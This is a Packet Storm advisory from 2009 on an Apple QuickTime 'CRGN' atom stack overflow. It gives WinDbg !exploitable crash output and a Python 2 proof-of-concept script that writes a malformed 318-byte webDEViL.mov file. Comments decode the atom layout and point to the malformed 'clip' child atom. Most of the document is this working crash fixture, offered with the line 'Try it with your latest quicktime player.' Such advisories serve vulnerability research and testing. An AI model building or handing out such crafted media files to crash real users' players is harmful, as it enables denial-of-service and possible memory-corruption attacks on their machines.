Apple QuickTime CRGN Atom Overflow

2009-06-15T00:00:00
ID PACKETSTORM:78411
Type packetstorm
Reporter webDEViL
Modified 2009-06-15T00:00:00

Description

                                        
                                            `Try it with your latest quicktime player.  
--------------------------------------------------------------  
  
#0:000> !exploitable -v  
#HostMachine\HostUser  
#Executing Processor Architecture is x86  
#Debuggee is in User Mode  
#Debuggee is a live user mode debugging session on the local machine  
#Event Type: Exception  
#Exception Faulting Address: 0x66830f9b  
#First Chance Exception Type: STATUS_STACK_OVERFLOW (0xC00000FD)  
#  
#Faulting Instruction:66830f9b push ebx  
#  
#Basic Block:  
# 66830f9b push ebx  
# Tainted Input Operands: ebx  
# 66830f9c push ebp  
# 66830f9d mov ebp,dword ptr <unloaded_papi.dll>+0x41f (00000420)[esp]  
# 66830fa4 push esi  
# 66830fa5 push edi  
# 66830fa6 mov edi,ecx  
# 66830fa8 cmp edi,offset <unloaded_papi.dll>+0x5ff (00000600)  
# 66830fae mov ebx,edx  
# 66830fb0 mov dword ptr [esp+14h],eax  
# 66830fb4 mov byte ptr [esp+10h],0  
# 66830fb9 mov byte ptr [esp+11h],0  
# 66830fbe mov byte ptr [esp+12h],0  
# 66830fc3 je quicktime!dllmain+0x2fbc4 (668310a4)  
#  
#Exception Hash (Major/Minor): 0x614b6671.0x614b786e  
#  
#Stack Trace:  
#QuickTime!DllMain+0x2fabb  
#<Unloaded_papi.dll>+0x1231137  
#Instruction Address: 0x66830f9b  
#  
#Description: Stack Overflow  
#Short Description: StackOverflow  
#Exploitability Classification: UNKNOWN  
#Recommended Bug Title: Stack Overflow starting at QuickTime!DllMain+0x2fabb (Hash=0x614b6671.0x614b786e)  
  
# Python 2 script (print statements are Python 2 syntax): writes the 318-byte
# crash fixture described in the advisory above to webDEViL.mov in the current
# directory.
print "------------------------------"  
print "w3bd3vil [at] gmail [dot] com"  
print "Apple QuickTime CRGN Atom 0day"  
print "------------------------------"  
# Layout of the literal below, decoded from its own 4-byte big-endian size
# fields and ASCII type codes (offsets are into the written file):
#   0x000 'ftyp'  size 0x18 (24)
#   0x018 'moov'  size 0x116 (278)
#     0x020 'mvhd' size 0x6C (108)
#     0x08C 'trak' size 0xA2 (162)
#       0x094 'tkhd' size 0x5C (92)
#       0x0F0 'clip' size 0x1A (26) -- encloses 18 payload bytes
#         0x0F8 child atom: declared size 0x0E (14), type bytes
#               0x63 0x72 0x67 0xFF ("crg" + 0xFF, not ASCII "crgn"),
#               then 11 x 0xFF. Its declared size (14) disagrees with the
#               18 bytes the parent 'clip' actually encloses; this is the
#               malformed region the advisory title refers to.
#       0x10A 'edts' size 0x24 (36)
#         0x112 'elst' size 0x1C (28)
#   0x12E 'free'  size 0x08
#   0x136 'free'  size 0x08
#   total 0x13E (318) bytes
# All other size fields are mutually consistent (each parent's size equals
# 8 + the sum of its children). Note that `bytes` shadows the Python builtin
# of the same name; harmless here since the builtin is never used.
bytes = [  
0x00, 0x00, 0x00, 0x18, 0x66, 0x74, 0x79, 0x70, 0x33, 0x67, 0x70,  
0x35, 0x00, 0x00, 0x01, 0x00, 0x33, 0x67, 0x70, 0x35, 0x33, 0x67,  
0x70, 0x34, 0x00, 0x00, 0x01, 0x16, 0x6D, 0x6F, 0x6F, 0x76, 0x00,  
0x00, 0x00, 0x6C, 0x6D, 0x76, 0x68, 0x64, 0x00, 0x00, 0x00, 0x00,  
0xBF, 0x88, 0x12, 0x28, 0xBF, 0x88, 0x12, 0x28, 0x00, 0x00, 0x02,  
0x58, 0x00, 0x00, 0x0B, 0x90, 0x00, 0x01, 0x00, 0x00, 0x01, 0x00,  
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  
0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,  
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,  
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00,  
0xA2, 0x74, 0x72, 0x61, 0x6B, 0x00, 0x00, 0x00, 0x5C, 0x74, 0x6B,  
0x68, 0x64, 0x00, 0x00, 0x00, 0x01, 0xBF, 0x88, 0x12, 0x28, 0xBF,  
0x88, 0x12, 0x28, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,  
0x00, 0x00, 0x0B, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,  
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00,  
0x00, 0x00, 0xB0, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x00,  
# 'clip' atom (size 0x1A) begins at the 0x00, 0x1A below; its child atom
# header (size 0x0E, type 0x63 0x72 0x67 0xFF) follows on the next row.
0x00, 0x1A, 0x63, 0x6C, 0x69, 0x70, 0x00, 0x00, 0x00, 0x0E, 0x63,  
0x72, 0x67, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,  
# 'edts' (size 0x24) containing 'elst' (size 0x1C) starts after the last
# two 0xFF bytes below.
0xFF, 0xFF, 0x00, 0x00, 0x00, 0x24, 0x65, 0x64, 0x74, 0x73, 0x00,  
0x00, 0x00, 0x1c, 0x65, 0x6c, 0x73, 0x74, 0x00, 0x00, 0x00, 0x00,  
0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0b, 0x90, 0x00, 0x00, 0x00,  
# Two trailing 8-byte 'free' atoms close the file.
0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72,  
0x65, 0x65, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, 0x65, 0x65 ]  
  
f = open("webDEViL.mov", "wb")  
# Python 2 str semantics: "%c" % byte yields a one-character str, so each
# int in the list is written as exactly one raw byte.
for byte in bytes: f.write("%c" % byte)  
f.close()  
print "webDEViL.mov created! (%d bytes)" % len(bytes)  
`